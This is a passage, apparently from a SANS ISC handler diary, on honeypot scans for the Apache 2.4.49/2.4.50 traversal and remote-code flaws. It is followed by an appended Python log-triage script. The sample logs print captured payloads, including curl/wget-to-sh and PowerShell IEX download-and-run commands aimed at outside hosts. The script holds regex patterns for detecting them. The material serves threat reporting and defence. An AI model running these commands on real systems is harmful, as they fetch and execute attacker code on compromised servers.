Johannes published a diary [1] on this activity last week for an Apache 2.4.49 directory traversal vulnerability where the patch was made available on September 15, 2021. Apache released a new update on October 7, 2021, indicating their advisory for "Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)". The current patched version is 2.4.51.

My honeypot has since captured various types of scans looking for the presence of Apache.

Sample Logs

20211012-225407: 192.168.25.9:80-202.28.250.122:51783 data (curl -k -H Host:heuristic-hermann-392016.netlify.app -fsSL https://52.220.244.242/stg_ntf.sh||wget --no-check-certificate --header=Host:heuristic-hermann-392016.netlify.app -q -O- https://52.220.244.242/stg_ntf.sh)|sh'

20211006-034517: 192.168.25.9:443-46.101.59.235:44008 data

20211013-152703: 192.168.25.9:80-202.28.250.122:42323 data powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'https://heuristic-hermann-392016.netlify.app/stg_ntf.c3.ps1\'))"'

20211016-142000: 192.168.25.9:443-45.146.164.110:48238 data A=|echo;echo -n GTtHWsFXPn|md5sum'

Indicators

heuristic-hermann-392016.netlify.app

The current fix to this issue is to update to Apache 2.4.51.

[1] https://isc.sans.edu/forums/diary/Apache+2449+Directory+Traversal+Vulnerability+CVE202141773/27908/
Guy, ISC Handler, Oct 16th 2021
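A triage sketch for honeypot lines in the layout of the sample logs above, added here as an example and not part of the original diary: it tags each captured payload and collects hosts from both the URL and an overridden Host header, grouped by scanning source. The sample lines, addresses, hostnames and rule names are constructed for illustration, and the line layout is an assumption inferred from the samples.

```python
import re
from collections import defaultdict

# Layout assumed from the diary's samples:
#   <YYYYMMDD-HHMMSS>: <sensor ip:port>-<source ip:port> data <payload>
LINE_RE = re.compile(r"^(?P<ts>\d{8}-\d{6}): [\d.]+:\d+-(?P<src>[\d.]+):\d+ data ?(?P<payload>.*)$")

# Rule names are illustrative labels chosen for this example.
RULES = [
    ("download-pipe-shell", re.compile(r"\b(curl|wget)\b.*\|\s*sh\b", re.I)),
    ("powershell-download-cradle", re.compile(r"powershell.*\bIEX\b.*downloadstring", re.I)),
    ("echo-md5-probe", re.compile(r"\becho\b.*\|\s*md5sum\b", re.I)),
]
# The hostname can sit in an overridden Host header while the URL carries a bare IP.
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
HOST_HDR_RE = re.compile(r"Host:\s*([A-Za-z0-9.-]+)")

# Constructed sample lines (documentation IPs, .invalid hosts), not honeypot data.
SAMPLE = """
20211012-225407: 192.0.2.10:80-203.0.113.20:51783 data (curl -k -H Host:stage.example.invalid -fsSL https://198.51.100.7/s.sh||wget --header=Host:stage.example.invalid -q -O- https://198.51.100.7/s.sh)|sh
20211006-034517: 192.0.2.10:443-203.0.113.5:44008 data
20211013-152703: 192.0.2.10:80-203.0.113.20:42323 data powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://stage.example.invalid/s.ps1'))"
20211016-142000: 192.0.2.10:443-203.0.113.77:48238 data A=|echo;echo -n CONSTRUCTEDTOKEN|md5sum
"""

def classify(line):
    """Parse one log line; return None if it does not match the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    payload = m["payload"]
    tags = [name for name, rx in RULES if rx.search(payload)]
    if not tags:
        tags = ["unclassified" if payload else "no-payload"]
    hosts = set(URL_HOST_RE.findall(payload)) | set(HOST_HDR_RE.findall(payload))
    return {"ts": m["ts"], "src": m["src"], "tags": tags, "hosts": hosts}

def summarize(lines):
    """Group payload tags and referenced hosts by scanning source IP."""
    acc = defaultdict(lambda: {"tags": set(), "hosts": set()})
    for rec in filter(None, map(classify, lines)):
        acc[rec["src"]]["tags"].update(rec["tags"])
        acc[rec["src"]]["hosts"].update(rec["hosts"])
    return {src: {k: sorted(v) for k, v in d.items()} for src, d in acc.items()}

if __name__ == "__main__":
    for src, info in summarize(SAMPLE.splitlines()).items():
        print(src, info["tags"], info["hosts"])
```
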